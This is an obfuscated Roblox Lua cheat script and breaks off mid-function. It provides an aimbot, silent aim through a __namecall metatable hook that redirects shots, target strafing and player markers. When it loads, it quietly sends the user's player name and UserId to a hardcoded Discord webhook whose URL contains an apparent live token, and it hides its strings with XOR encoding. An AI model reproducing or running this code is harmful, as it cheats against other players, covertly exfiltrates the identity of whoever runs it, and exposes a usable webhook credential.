--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.3) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v150,v151) local v152={};for v312=1, #v150 do v6(v152,v0(v4(v1(v2(v150,v312,v312 + 1 )),v1(v2(v151,1 + (v312% #v151) ,1 + (v312% #v151) + 1 )))%256 ));end return v5(v152);end repeat wait();until game:IsLoaded() local v8=game:GetService(v7("\249\215\207\53\213\190\213\8\216\192\222","\126\177\163\187\69\134\219\167"));local v9="https://discord.com/api/webhooks/1208884918739017739/B5uGwAkpi3zS4PI5H6Sd6eZ2J-PUzVF8GRrXnapgSB2wsC6rh1edXvH4Vz11v_7R_Xtw";function SendWebhook() local v153=403 -(391 + 12) ;local v154;local v155;local v156;local v157;local v158;while true do if (v153==(0 + 0)) then local v360=1918 -(639 + 1279) ;while true do if (v360==(1 -0)) then v153=1 + 0 ;break;end if (v360==(0 -0)) then v154=game.Players.LocalPlayer;v155=v154.UserId;v360=119 -(88 + 30) ;end end end if ((774 -(720 + 51))==v153) then request({[v7("\157\111\112","\35\200\29\28\72\115\20\154")]=v157,[v7("\52\186\197\215\130\40","\84\121\223\177\191\237\76")]=v7("\139\121\250\148","\161\219\54\169\192\90\48\80"),[v7("\97\71\1\33\76\80\19","\69\41\34\96")]={[v7("\159\204\217\30\7\37\168\142\227\19\18\46","\75\220\163\183\106\98")]="application/json"},[v7("\32\181\143\46","\185\98\218\235\87")]=game.HttpService:JSONEncode(v158)});break;end if (v153==(4 -2)) then v158={[v7("\54\222\47\215\242\34\192\47","\156\67\173\74\165")]=v7("\7\180\91\31\172\50\6\3\178\75\30\179\41\77","\38\84\215\41\118\220\70"),[v7("\83\25\44\6\251\94\2","\158\48\118\66\114")]=string.format(v7("\238\55\80\126\90\129\161\235\97\20\127\51\164\187\174\60\21\53\102\177\250\191\100\3\53\97\172\235\191\49\28\119","\155\203\68\112\86\19\197"),v156,v155),[v7("\82\212\59\249\83\108\228\245\86","\152\38\189\86\156\32\24\133")]=os.date(v7("\185\110\234\3\241\26\226\66\200\18\159\8\172\7\247\124","\38\156\55\199"))};request=http_request or request or HttpPost or syn.request ;v153=1779 -(421 + 1355) ;end if ((1 -0)==v153) then v156=v154.Name;v157=v9;v153=2;end end end SendWebhook();getgenv().Enabled=false;getgenv().OldAimPart=v7("\227\41\42\231\208\165\194\56\21\233\209\190\251\61\53\242","\202\171\92\71\134\190");getgenv().AimPart=v7("\1\212\33\137\39\206\37\140\27\206\35\156\25\192\62\156","\232\73\161\76");getgenv().AimRadius=math.huge;getgenv().ThirdPerson=true;getgenv().FirstPerson=true;getgenv().TeamCheck=false;getgenv().PredictMovement=true;getgenv().PredictionVelocity=3.728;getgenv().CheckIfJumped=true;getgenv().Smoothness=false;getgenv().SmoothnessAmount=0.0306 + 0 ;getgenv().DisableOnPlayerDeath=false;getgenv().DisableOnTargetDeath=false;getgenv().AntiGroundShots=true;getgenv().Shake=false;getgenv().ShakeValue=5;function Notify(v159) game:GetService(v7("\136\205\67\79\10\190\203\101\72\23","\126\219\185\34\61")):SetCore(v7("\63\203\80\118\80\120\231\238\10\199\93\115\106\126\252\233","\135\108\174\62\18\30\23\147"),{[v7("\130\224\62\199\29","\167\214\137\74\171\120\206\83")]=v7("\168\241\63\81\247\164\128","\199\235\144\82\61\152"),[v7("\51\19\161\63","\75\103\118\217")]=v159,[v7("\227\65\98\21\173\23\200\90","\126\167\52\16\116\217")]=1088 -(286 + 797) });end if (getgenv().Loaded==true) then local v313=0 -0 ;while true do if (0==v313) then Notify(v7("\252\38\37\192\167\26\238\193\62\52\192\189\10\188\201\34\50\133\181\29\229\136\34\47\129\176\28\248\137","\156\168\78\64\224\212\121"));return;end end end getgenv().Loaded=true;local v29,v30,v31,v32=game:GetService(v7("\55\226\164\215\2\252\182","\174\103\142\197")),game:GetService(v7("\99\59\90\42\12\80\232\67\60\108\61\55\72\241\85\45","\152\54\72\63\88\69\62")),game:GetService(v7("\230\209\224\111\209\214\248\85\215\193","\60\180\164\142")),game:GetService(v7("\107\74\4\59\51\232\0\127\75\12","\114\56\62\101\73\71\141"));local v33,v34,v35,v36,v37,v38,v39=v29.LocalPlayer,v29.LocalPlayer:GetMouse(),workspace.CurrentCamera,CFrame.new,Ray.new,Vector3.new,Vector2.new;local v40,v41,v42=true,false,false;local v43;local v44;getgenv().WorldToViewportPoint=function(v160) return v35:WorldToViewportPoint(v160);end;getgenv().WorldToScreenPoint=function(v161) return v35.WorldToScreenPoint(v35,v161);end;getgenv().GetObscuringObjects=function(v162) if (v162 and v162:FindFirstChild(getgenv().AimPart) and v33 and v33.Character:FindFirstChild(v7("\144\236\218\192","\164\216\137\187"))) then local v325=0 -0 ;local v326;local v327;while true do if (v325==1) then while true do if (v326==(439 -(397 + 42))) then v327=workspace:FindPartOnRay(v37(v162[getgenv().AimPart].Position,v33.Character.Head.Position));if v327 then return v327:IsDescendantOf(v162);end break;end end break;end if (v325==0) then v326=0 + 0 ;v327=nil;v325=801 -(24 + 776) ;end end end end;getgenv().GetNearestTarget=function() local v163=0 -0 ;local v164;local v165;local v166;local v167;while true do if (v163==3) then v167=math.floor(math.min(unpack(v166)));if (v167>getgenv().AimRadius) then return nil;end v163=789 -(222 + 563) ;end if (v163==(1 -0)) then v166={};for v373,v374 in pairs(v29:GetPlayers()) do if (v374~=v33) then table.insert(v164,v374);end end v163=2 + 0 ;end if (v163==(194 -(23 + 167))) then for v375,v376 in pairs(v165) do if (v376.diff==v167) then return v376.plr;end end return nil;end if (v163==(1798 -(690 + 1108))) then v164={};v165={};v163=1;end if (v163==2) then for v377,v378 in pairs(v164) do if (v378.Character~=nil) then local v424=v378.Character:FindFirstChild(v7("\250\227\48\182","\107\178\134\81\210\198\158"));if ((getgenv().TeamCheck==true) and (v378.Team~=v33.Team)) then local v447=0;local v448;local v449;local v450;local v451;local v452;local v453;while true do if (v447==(0 + 0)) then v448=0;v449=nil;v447=1 + 0 ;end if (v447==(849 -(40 + 808))) then v450=nil;v451=nil;v447=1 + 1 ;end if (v447==3) then while true do if ((11 -8)==v448) then local v524=0 + 0 ;while true do if (v524==(1 + 0)) then v448=4;break;end if (v524==(0 + 0)) then v165[v378.Name   .. v377 ].plr=v378;v165[v378.Name   .. v377 ].diff=v453;v524=572 -(47 + 524) ;end end end if (v448==(1 + 0)) then local v525=0;while true do if (v525==(2 -1)) then v448=2 -0 ;break;end if (v525==(0 -0)) then v451,v452=game.Workspace:FindPartOnRay(v450,game.Workspace);v453=math.floor((v452-v424.Position).magnitude);v525=1;end end end if (v448==(1730 -(1165 + 561))) then table.insert(v166,v453);break;end if (v448==2) then v165[v378.Name   .. v377 ]={};v165[v378.Name   .. v377 ].dist=v449;v448=3;end if (v448==0) then v449=(v378.Character:FindFirstChild(v7("\16\11\131\194","\202\88\110\226\166")).Position-game.Workspace.CurrentCamera.CFrame.p).magnitude;v450=Ray.new(game.Workspace.CurrentCamera.CFrame.p,(v34.Hit.p-game.Workspace.CurrentCamera.CFrame.p).unit * v449 );v448=1 + 0 ;end end break;end if ((6 -4)==v447) then v452=nil;v453=nil;v447=2 + 1 ;end end elseif ((getgenv().TeamCheck==false) and (v378.Team==v33.Team)) then local v488=479 -(341 + 138) ;local v489;local v490;local v491;local v492;local v493;while true do if (v488==0) then v489=(v378.Character:FindFirstChild(v7("\235\10\131\243","\170\163\111\226\151")).Position-game.Workspace.CurrentCamera.CFrame.p).magnitude;v490=Ray.new(game.Workspace.CurrentCamera.CFrame.p,(v34.Hit.p-game.Workspace.CurrentCamera.CFrame.p).unit * v489 );v488=1 + 0 ;end if (v488==(1 -0)) then v491,v492=game.Workspace:FindPartOnRay(v490,game.Workspace);v493=math.floor((v492-v424.Position).magnitude);v488=328 -(89 + 237) ;end if (v488==(9 -6)) then v165[v378.Name   .. v377 ].plr=v378;v165[v378.Name   .. v377 ].diff=v493;v488=8 -4 ;end if (v488==(883 -(581 + 300))) then local v521=1220 -(855 + 365) ;while true do if (v521==0) then local v562=0 -0 ;while true do if (v562==(1 + 0)) then v521=1;break;end if (v562==0) then v165[v378.Name   .. v377 ]={};v165[v378.Name   .. v377 ].dist=v489;v562=1;end end end if ((1236 -(1030 + 205))==v521) then v488=3 + 0 ;break;end end end if (v488==(4 + 0)) then table.insert(v166,v493);break;end end end end end if (unpack(v166)==nil) then return nil;end v163=289 -(156 + 130) ;end end end;local v49=Instance.new(v7("\37\63\189\52","\73\113\80\210\88\46\87"));v49.RequiresHandle=false;v49.Name=v7("\186\7\238\61\203\172\5\236\47","\135\225\76\173\114");v49.Parent=game.Players.LocalPlayer.Backpack;v49.TextureId="rbxassetid://5998624778";v49.Activated:Connect(function() if getgenv().Enabled then if  not (v30:GetFocusedTextBox()) then if (v43==nil) then pcall(function() local v440=0 -0 ;local v441;while true do if ((1 -0)==v440) then v441=GetNearestTarget();if (v441~=nil) then local v511=0 -0 ;while true do if (v511==(0 + 0)) then CToggle=true;v43=v441;v511=1;end if (v511==(1 + 0)) then Notify(v7("\54\226\187\187\169\185\231\21\227\172\191\246\253","\199\122\141\216\208\204\221")   .. tostring(v43.Character.Humanoid.DisplayName) );break;end end end break;end if (v440==0) then local v494=0;while true do if (v494==(70 -(10 + 59))) then v440=1 + 0 ;break;end if (v494==(0 -0)) then if (v41~=true) then v41=true;end v441=nil;v494=1164 -(671 + 492) ;end end end end end);elseif (v43~=nil) then local v454=0 + 0 ;while true do if (v454==(1215 -(369 + 846))) then local v502=0;while true do if (v502==(0 + 0)) then v43=nil;CToggle=false;v502=1 + 0 ;end if (v502==(1946 -(1036 + 909))) then v454=1;break;end end end if (v454==(1 + 0)) then Notify(v7("\152\211\28\255\123\253\168\217","\150\205\189\112\144\24"));break;end end end end end end);v31.RenderStepped:Connect(function() if (getgenv().DisableOnTargetDeath==true) then if v43 then if ((v43.Character.Humanoid.Health<=(8 -3)) or (v.plr.Character.Humanoid.Health<=(208 -(11 + 192)))) then local v425=0 + 0 ;local v426;while true do if (v425==0) then v426=175 -(135 + 40) ;while true do if (v426==0) then CToggle=false;v43=nil;break;end end break;end end end end end end);v31.RenderStepped:Connect(function() if (getgenv().DisableOnPlayerDeath==true) then if v43 then if (game.Players.LocalPlayer.Character.Humanoid.Health<=(11 -6)) then local v427=0;while true do if (v427==(0 + 0)) then CToggle=false;v43=nil;break;end end end end end end);v31.RenderStepped:Connect(function() local v168=0;local v169;local v170;while true do if (v168==1) then while true do if (v169==(0 -0)) then v170=0 -0 ;while true do if (v170==(176 -(50 + 126))) then local v477=0 -0 ;while true do if (v477==(0 + 0)) then if ((getgenv().ThirdPerson==true) and (getgenv().FirstPerson==true)) then if (((v35.Focus.p-v35.CoordinateFrame.p).Magnitude>1) or ((v35.Focus.p-v35.CoordinateFrame.p).Magnitude<=(1414 -(1233 + 180)))) then v42=true;else v42=false;end elseif ((getgenv().ThirdPerson==true) and (getgenv().FirstPerson==false)) then if ((v35.Focus.p-v35.CoordinateFrame.p).Magnitude>(970 -(522 + 447))) then v42=true;else v42=false;end elseif ((getgenv().ThirdPerson==false) and (getgenv().FirstPerson==true)) then if ((v35.Focus.p-v35.CoordinateFrame.p).Magnitude<=1) then v42=true;else v42=false;end end if (v40==true) then if (v43 and v43.Character and v43.Character:FindFirstChild(getgenv().AimPart)) then if (getgenv().FirstPerson==true) then if (v42==true) then if (getgenv().PredictMovement==true) then if (getgenv().Smoothness==true) then local v618=0;local v619;while true do if (v618==(1421 -(107 + 1314))) then v619=v36(v35.CFrame.p,v43.Character[getgenv().AimPart].Position + (v43.Character[getgenv().AimPart].Velocity/PredictionVelocity) );v35.CFrame=v35.CFrame:Lerp(v619,getgenv().SmoothnessAmount,Enum.EasingStyle.Elastic,Enum.EasingDirection.InOut);break;end end else v35.CFrame=v36(v35.CFrame.p,v43.Character[getgenv().AimPart].Position + (v43.Character[getgenv().AimPart].Velocity/PredictionVelocity) );end elseif (getgenv().PredictMovement==false) then if (getgenv().Smoothness==true) then local v623=0;local v624;while true do if (v623==0) then v624=v36(v35.CFrame.p,v43.Character[getgenv().AimPart].Position);v35.CFrame=v35.CFrame:Lerp(v624,getgenv().SmoothnessAmount,Enum.EasingStyle.Elastic,Enum.EasingDirection.InOut);break;end end else v35.CFrame=v36(v35.CFrame.p,v43.Character[getgenv().AimPart].Position);end end end end end end v477=1;end if (v477==1) then v170=1;break;end end end if ((1 + 0)==v170) then if (CheckIfJumped==true) then if v43 then if (v43.Character.Humanoid.FloorMaterial==Enum.Material.Air) then getgenv().AimPart=v7("\13\145\178\77\10\135\24\20\23\139\176\88\52\137\3\4","\112\69\228\223\44\100\232\113");else getgenv().AimPart=getgenv().OldAimPart;end end end break;end end break;end end break;end if (v168==(0 -0)) then v169=0 + 0 ;v170=nil;v168=1 -0 ;end end end);game.Players.LocalPlayer.CharacterAdded:Connect(function() v49.Parent=game.Players.LocalPlayer.Backpack;end);local v55={[v7("\198\26\16\193\191\104\146\209\17\10\210\191\114","\230\180\127\103\179\214\28")]={[v7("\169\11\94\68\232\68\228","\128\236\101\63\38\132\33")]=false,[v7("\136\134\37","\175\204\201\113\36\214\139")]=true,[v7("\102\229\7\239\44\104\248","\100\39\172\85\188")]=true,[v7("\131\87\141\169\21","\83\205\24\217\224")]=false,[v7("\199\240\249\18\214\247\232\25","\93\134\165\173")]=false,[v7("\152\221\247","\30\222\146\161\162\90\174\210")]=math.huge,[v7("\215\107\67\37\211\98\85\56","\106\133\46\16")]=false,[v7("\107\37\127\249\89\84\93\36\67\253\72\84","\32\56\64\19\156\58")]=v7("\111\216\245\83\72\198\143\72\219\234","\224\58\168\133\54\58\146"),[v7("\105\68\78\249\124\133\147\2\86\88","\107\57\54\43\157\21\230\231")]=true,[v7("\235\153\20\241\176\223\219\210\132\31\195\184\208\218\222","\175\187\235\113\149\217\188")]=0.151 -0 ,[v7("\17\170\149\68\236\125","\24\92\207\225\44\131\25")]=v7("\102\252\141\127\62","\29\43\179\216\44\123"),[v7("\141\213\33\85\184\203\4\73\188\205\40","\44\221\185\64")]=false,[v7("\53\230\90\88\118\21\195\65\90\119","\19\97\135\40\63")]=false,[v7("\130\83\60\48\14\37","\81\206\60\83\91\79")]=false}};local v56=0;local v57=1960 -(716 + 1194) ;local v58=game:GetService(v7("\121\164\194\121\60\211\76\167\75","\196\46\203\176\18\79\163\45")).CurrentCamera;local v59;local v60=false;local v61=0.12348 + 0 ;local v62=game.Players.LocalPlayer:GetMouse();local v63=Instance.new(v7("\136\35\108\10","\143\216\66\30\126\68\155"),game.Workspace);function makemarker(v173,v174,v175,v176,v177) local v178=Instance.new(v7("\136\193\1\199\199\172\214\243\174\239\24\194","\129\202\168\109\171\165\195\183"),v173);v178.Name=v7("\18\104","\134\66\56\87\184\190\116");v178.Adornee=v174;v178.Size=UDim2.new(v176,v177,v176,v177);v178.AlwaysOnTop=v55.rewrittenmain.DOT;local v184=Instance.new(v7("\26\35\8\182\28","\85\92\81\105\219\121\139\65"),v178);if (v55.rewrittenmain.DOT==true) then v184.Size=UDim2.new(1 + 1 ,505 -(74 + 429) ,3 -1 );else v184.Size=UDim2.new(0,0,0 + 0 ,0 -0 );end if (v55.rewrittenmain.DOT==true) then local v330=0 + 0 ;while true do if ((0 -0)==v330) then v184.Transparency=0 -0 ;v184.BackgroundTransparency=0;break;end end else local v331=0;local v332;while true do if (v331==(433 -(279 + 154))) then v332=0;while true do if (v332==(778 -(454 + 324))) then v184.Transparency=1 + 0 ;v184.BackgroundTransparency=18 -(12 + 5) ;break;end end break;end end end v184.BackgroundColor3=v175;local v186=Instance.new(v7("\200\154\115\74\110\209\248\161","\191\157\211\48\37\28"),v184);if (v55.rewrittenmain.DOT==false) then v186.CornerRadius=UDim.new(0 + 0 ,0);else v186.CornerRadius=UDim.new(2 -1 ,1 + 0 );end return v178;end local v64=game.Players:GetPlayers();function noob(v187) local v188;repeat wait();until v187.Character local v189=makemarker(guimain,v187.Character:WaitForChild(v55.rewrittenmain.SelectedPart),Color3.fromRGB(68,214,44),1093.3 -(277 + 816) ,12 -9 );v189.Name=v187.Name;v187.CharacterAdded:connect(function(v314) v189.Adornee=v314:WaitForChild(v55.rewrittenmain.SelectedPart);end);spawn(function() while wait() do if v187.Character then end end end);end for v192=1184 -(1058 + 125) , #v64 do if (v64[v192]~=game.Players.LocalPlayer) then noob(v64[v192]);end end game.Players.PlayerAdded:connect(function(v193) noob(v193);end);spawn(function() local v194=0 + 0 ;while true do if (v194==(976 -(815 + 160))) then if (v55.rewrittenmain.DOT==true) then v63.Size=Vector3.new(25 -19 ,14 -8 ,2 + 4 );else v63.Size=Vector3.new(0 -0 ,1898 -(41 + 1857) ,0);end v63.Transparency=1894 -(1222 + 671) ;v194=5 -3 ;end if (0==v194) then v63.Anchored=true;v63.CanCollide=false;v194=1 -0 ;end if (v194==(1184 -(229 + 953))) then if v55.rewrittenmain.DOT then makemarker(v63,v63,Color3.fromRGB(1842 -(1111 + 663) ,214,1623 -(874 + 705) ),0.4 + 0 ,0 + 0 );end break;end end end);local v40=Instance.new(v7("\235\16\251\16","\90\191\127\148\124"));v40.Name=v7("\89\142\35\27\119\132\37","\119\24\231\78");v40.Parent=game.Players.LocalPlayer.Backpack;v40.RequiresHandle=false;v40.Activated:Connect(function() if v55.rewrittenmain.Enabled then if (v60==true) then local v379=0 -0 ;local v380;while true do if (v379==(0 + 0)) then v380=0;while true do if (v380==(679 -(642 + 37))) then v60=false;if (v55.rewrittenmain.NOTIF==true) then v59=getClosestPlayerToCursor();game.StarterGui:SetCore(v7("\177\40\171\78\242\79\5\139\43\172\73\221\84\24\141\35","\113\226\77\197\42\188\32"),{[v7("\14\31\224\185\63","\213\90\118\148")]=v7("\104\43\172\22\99\84\58\189\80\68\88\47\160\95\66\85","\45\59\78\212\54"),[v7("\36\83\155\159","\144\112\54\227\235\230\78\205")]=v7("\134\38\3\243\211\80\182\44","\59\211\72\111\156\176"),[v7("\103\132\236\35","\77\46\231\131")]="",[v7("\158\65\164\65\174\93\185\78","\32\218\52\214")]=1 + 0 });end break;end end break;end end else local v381=0 + 0 ;while true do if (v381==(2 -1)) then if (v55.rewrittenmain.NOTIF==true) then game.StarterGui:SetCore(v7("\125\18\63\172\223\191\81\83\72\30\50\169\229\185\74\84","\58\46\119\81\200\145\208\37"),{[v7("\31\133\36\160\172","\86\75\236\80\204\201\221")]=v7("\65\68\111\197\208\132\102\72\113\140\253\138\102\72\120\139","\235\18\33\23\229\158"),[v7("\100\191\217\175","\219\48\218\161")]=v7("\200\126\127\66\222\75\160\203\127\60\19","\128\132\17\28\41\187\47")   .. tostring(v59.Character.Humanoid.DisplayName) ,[v7("\40\49\9\52","\61\97\82\102\90")]="",[v7("\136\59\185\74\211\94\17\7","\105\204\78\203\43\167\55\126")]=455 -(233 + 221) });end break;end if (v381==(0 -0)) then local v442=0 + 0 ;while true do if (v442==(1542 -(718 + 823))) then v381=1;break;end if (v442==(0 + 0)) then v59=getClosestPlayerToCursor();v60=true;v442=806 -(266 + 539) ;end end end end end end end);function getClosestPlayerToCursor() local v195=0 -0 ;local v196;local v197;while true do if (v195==1) then local v365=1225 -(636 + 589) ;while true do if ((0 -0)==v365) then for v443,v444 in pairs(game.Players:GetPlayers()) do if ((v444~=game.Players.LocalPlayer) and v444.Character and v444.Character:FindFirstChild(v7("\141\191\46\31\29\11\206\85","\49\197\202\67\126\115\100\167")) and (v444.Character.Humanoid.Health~=(0 -0)) and v444.Character:FindFirstChild(v7("\31\78\210\40\142\89\87\51\105\208\38\148\102\95\37\79","\62\87\59\191\73\224\54"))) then local v478=0;local v479;local v480;while true do if (v478==(1 + 0)) then if (v480<v197) then local v529=0;local v530;while true do if (v529==(0 + 0)) then v530=0;while true do if (v530==(1015 -(657 + 358))) then v196=v444;v197=v480;break;end end break;end end end break;end if (v478==(0 -0)) then v479=v58:WorldToViewportPoint(v444.Character.PrimaryPart.Position);v480=(Vector2.new(v479.X,v479.Y) -Vector2.new(v62.X,v62.Y)).magnitude;v478=2 -1 ;end end end end return v196;end end end if (v195==0) then v196=nil;v197=v55.rewrittenmain.FOV;v195=1188 -(1151 + 36) ;end end end v31.RenderStepped:Connect(function() if (v55.rewrittenmain.TargetDied==true) then if v59 then if (v59.Character.Humanoid.Health<=(5 + 0)) then local v428=0 + 0 ;while true do if ((2 -1)==v428) then v63.CFrame=CFrame.new(1832 -(1552 + 280) ,10833 -(64 + 770) ,0 + 0 );break;end if (v428==(0 -0)) then v60=false;v59=nil;v428=1;end end end end end end);v31.RenderStepped:Connect(function() if (v55.rewrittenmain.PlayerDeath==true) then if v59 then if (game.Players.LocalPlayer.Character.Humanoid.Health<=(1 + 4)) then local v429=1243 -(157 + 1086) ;while true do if (v429==1) then v63.CFrame=CFrame.new(0 -0 ,43792 -33793 ,0);break;end if (v429==0) then v60=false;v59=nil;v429=1;end end end end end end);local v68=nil;local v69=nil;local v70=nil;game:GetService(v7("\213\23\244\250\226\16\236\192\228\7","\169\135\98\154")).Stepped:connect(function() local v198=0 -0 ;while true do if (v198==0) then if (v60 and (v59.Character~=nil) and v59.Character:FindFirstChild(v7("\227\98\41\85\243\60\193\207\69\43\91\233\3\201\217\99","\168\171\23\68\52\157\83"))) then v63.CFrame=CFrame.new(v59.Character.HumanoidRootPart.Position + (v59.Character.HumanoidRootPart.Velocity * v61) );else v63.CFrame=CFrame.new(0,9999,0 -0 );end if (v55.rewrittenmain.AUTOPRED==true) then local v402=819 -(599 + 220) ;local v403;local v404;local v405;while true do if (v402==0) then local v457=0;while true do if (v457==(1 -0)) then v402=1932 -(1813 + 118) ;break;end if (v457==0) then local v503=0 + 0 ;while true do if (v503==0) then v403=game:GetService(v7("\199\101\244\185\54","\231\148\17\149\205\69\77")).Network.ServerStatsItem[v7("\164\166\211\250\23\207\137\169\192","\159\224\199\167\155\55")]:GetValueString();v404=string.split(v403,"(");v503=1218 -(841 + 376) ;end if (v503==(1 -0)) then v457=1;break;end end end end end if (v402==(1 + 0)) then v405=tonumber(v404[1]);if (v405<(354 -224)) then v55.rewrittenmain.PredictionValue=859.18 -(464 + 395) ;elseif (v405<125) then v55.rewrittenmain.PredictionValue=0.167 -0 ;elseif (v405<(53 + 57)) then v55.rewrittenmain.PredictionValue=837.157 -(467 + 370) ;elseif (v405<(216 -111)) then v55.rewrittenmain.PredictionValue=0.147 + 0 ;elseif (v405<(308 -218)) then v55.rewrittenmain.PredictionValue=0.137 + 0 ;elseif (v405<(186 -106)) then v55.rewrittenmain.PredictionValue=520.127 -(150 + 370) ;elseif (v405<(1352 -(74 + 1208))) then v55.rewrittenmain.PredictionValue=0.117 -0 ;elseif (v405<(284 -224)) then v55.rewrittenmain.PredictionValue=0.07;elseif (v405<(36 + 14)) then v55.rewrittenmain.PredictionValue=390.1225 -(14 + 376) ;elseif (v405<40) then v55.rewrittenmain.PredictionValue=0.1256 -0 ;end break;end end end break;end end end);local v71={[v7("\210\253\61\208\251\246\56","\178\151\147\92")]=false,[v7("\191\237\73\55\22","\26\236\157\44\82\114\44")]=1,[v7("\14\39\198\79\43\32\214\94","\59\74\78\181")]=1 + 0 ,[v7("\13\212\83\93\187\49","\211\69\177\58\58")]=1 + 0 };v31.Stepped:Connect(function() if (v59 and v71.Enabled) then local v335=0 + 0 ;while true do if (v335==0) then StrafeSpeed=v71.Speed;v33.Character.HumanoidRootPart.CFrame=v59.Character.HumanoidRootPart.CFrame * CFrame.Angles(0,math.rad(StrafeSpeed),0) * CFrame.new(0 -0 ,v71.Height,v71.Distance) ;break;end end end end);v31.Stepped:Connect(function() if (v55.rewrittenmain.Enabled and v59 and v59.Character and v55.rewrittenmain.LookAt) then local v336=0 + 0 ;local v337;local v338;local v339;local v340;local v341;local v342;while true do if (v336==(80 -(23 + 55))) then local v408=0 -0 ;while true do if (v408==(0 + 0)) then v341=(v340-v339).unit;v342=CFrame.new(v339,v339 + v341 );v408=1 + 0 ;end if (v408==1) then v336=4 -1 ;break;end end end if (v336==(0 + 0)) then v337=v33.Character;v338=v59.Character;v336=1;end if (v336==(902 -(652 + 249))) then v339=v337.HumanoidRootPart.Position;v340=v338.HumanoidRootPart.Position;v336=2;end if ((7 -4)==v336) then v337.HumanoidRootPart.CFrame=v342;break;end end end end);local v72=getrawmetatable(game);local v73=v72.__namecall;setreadonly(v72,false);v72.__namecall=newcclosure(function(...) local v199={...};if (v60 and (getnamecallmethod()==v7("\145\236\107\240\218\206\165\243\124\231","\171\215\133\25\149\137")) and (v199[5 -3 ]==v55.rewrittenmain.Method) and v55.rewrittenmain.Enabled and (v59.Character~=nil)) then local v343=0 -0 ;while true do if (v343==(27 -(10 + 17))) then local v414=0 + 0 ;while true do if (v414==0) then if (v55.rewrittenmain.Prediction==true) then v199[1735 -(1400 + 332) ]=v59.Character[v55.rewrittenmain.SelectedPart].Position + (v59.Character[v55.rewrittenmain.SelectedPart].Velocity * v55.rewrittenmain.PredictionValue) ;else v199[5 -2 ]=v59.Character[v55.rewrittenmain.SelectedPart].Position;end return v73(unpack(v199));end end end end end return v73(...);end);game:GetService(v7("\211\221\60\201\234\34\234\75\226\205","\34\129\168\82\154\143\80\156")).RenderStepped:Connect(function() if ((v55.rewrittenmain.RESOVLER==true) and (v59.Character~=nil) and v60 and v55.rewrittenmain.Enabled) then if ((v55.rewrittenmain.AIRSHOT==true) and v60 and (v59.Character~=nil)) then if (game.Workspace.Players[v59.Name].Humanoid:GetState()==Enum.HumanoidStateType.Freefall) then if ((v59.Character~=nil) and (v59.Character.HumanoidRootPart.Anchored==true)) then local v459=1908 -(242 + 1666) ;while true do if (v459==(0 + 0)) then v56=v56 + 1 + 0 ;if (v56>=v57) then local v522=0 + 0 ;while true do if (v522==(940 -(850 + 90))) then v55.rewrittenmain.Prediction=false;wait(3 -1 );v522=1;end if (v522==1) then v56=1390 -(360 + 1030) ;break;end end end break;end end else v55.rewrittenmain.Prediction=true;v56=0 + 0 ;end v55.rewrittenmain.SelectedPart=v7("\173\167\62\10\70\65\128\129\128\60\4\92\126\136\151\166","\233\229\210\83\107\40\46");else local v431=0;while true do if (v431==(0 -0)) then if ((v59.Character~=nil) and (v59.Character.HumanoidRootPart.Anchored==true)) then local v504=0;while true do if (v504==(0 -0)) then v56=v56 + 1 ;if (v56>=v57) then local v565=1661 -(909 + 752) ;while true do if (v565==0) then v55.rewrittenmain.Prediction=false;wait(2);v565=1;end if (v565==(1224 -(109 + 1114))) then v56=0;break;end end end break;end end else local v505=0;while true do if (v505==(0 -0)) then v55.rewrittenmain.Prediction=true;v56=0 + 0 ;break;end end end v55.rewrittenmain.SelectedPart=v7("\233\87\63\215\11\206\75\54\228\10\206\86\2\215\23\213","\101\161\34\82\182");break;end end end else local v382=242 -(6 + 236) ;local v383;while true do if (v382==(0 + 0)) then v383=0 + 0 ;while true do if (v383==0) then if ((v59.Character~=nil) and (v59.Character.HumanoidRootPart.Anchored==true)) then local v514=0 -0 ;local v515;while true do if (v514==(0 -0)) then v515=1133 -(1076 + 57) ;while true do if (v515==(0 + 0)) then v56=v56 + 1 ;if (v56>=v57) then local v593=689 -(579 + 110) ;local v594;while true do if (v593==(0 + 0)) then v594=0 + 0 ;while true do if (v594==1) then v56=0 + 0 ;break;end if (v594==(407 -(174 + 233))) then v55.rewrittenmain.Prediction=false;wait(2);v594=1;end end break;end end end break;end end break;end end else local v516=0 -0 ;local v517;while true do if (v516==(0 -0)) then v517=0;while true do if (v517==0) then v55.rewrittenmain.Prediction=true;v56=0 + 0 ;break;end end break;end end end v55.rewrittenmain.SelectedPart=v7("\192\24\84\255\213\237\139\42\218\2\86\234\235\227\144\58","\78\136\109\57\158\187\130\226");break;end end break;end end end else v55.rewrittenmain.SelectedPart=v7("\22\42\244\240\48\48\240\245\12\48\246\229\14\62\235\229","\145\94\95\153");end end);game.Players.LocalPlayer.CharacterAdded:Connect(function() v40.Parent=game.Players.LocalPlayer.Backpack;end);local v75=false;local v76=0.167;local v77=v7("\200\221\4\208\92\131\242\223\7\218","\215\157\173\116\181\46");local v35=game:GetService(v7("\2\187\153\249\201\37\181\136\247","\186\85\212\235\146")).CurrentCamera;local v34=game.Players.LocalPlayer:GetMouse();local v78=Instance.new(v7("\242\128\4\234","\56\162\225\118\158\89\142"),game.Workspace);v78.Anchored=true;v78.CanCollide=false;v78.Color=Color3.fromRGB(148,0,1385 -(663 + 511) );v78.Size=Vector3.new(1 + 0 ,1,1);v78.Shape=Enum.PartType.Ball;function FindClosestPlayer() local v202;local v203=math.huge;local v204=Vector2.new(v35.ViewportSize.X/(1 + 1) ,v35.ViewportSize.Y/(5 -3) );for v316,v317 in pairs(game.Players:GetPlayers()) do if ((v317~=game.Players.LocalPlayer) and v317.Character and v317.Character:FindFirstChild(v7("\116\16\205\174\44\215\85\1","\184\60\101\160\207\66")) and (v317.Character.Humanoid.Health~=0) and v317.Character:FindFirstChild(v7("\25\151\113\189\63\141\117\184\3\141\115\168\1\131\110\168","\220\81\226\28"))) then local v367=0 + 0 ;local v368;local v369;while true do if (v367==0) then 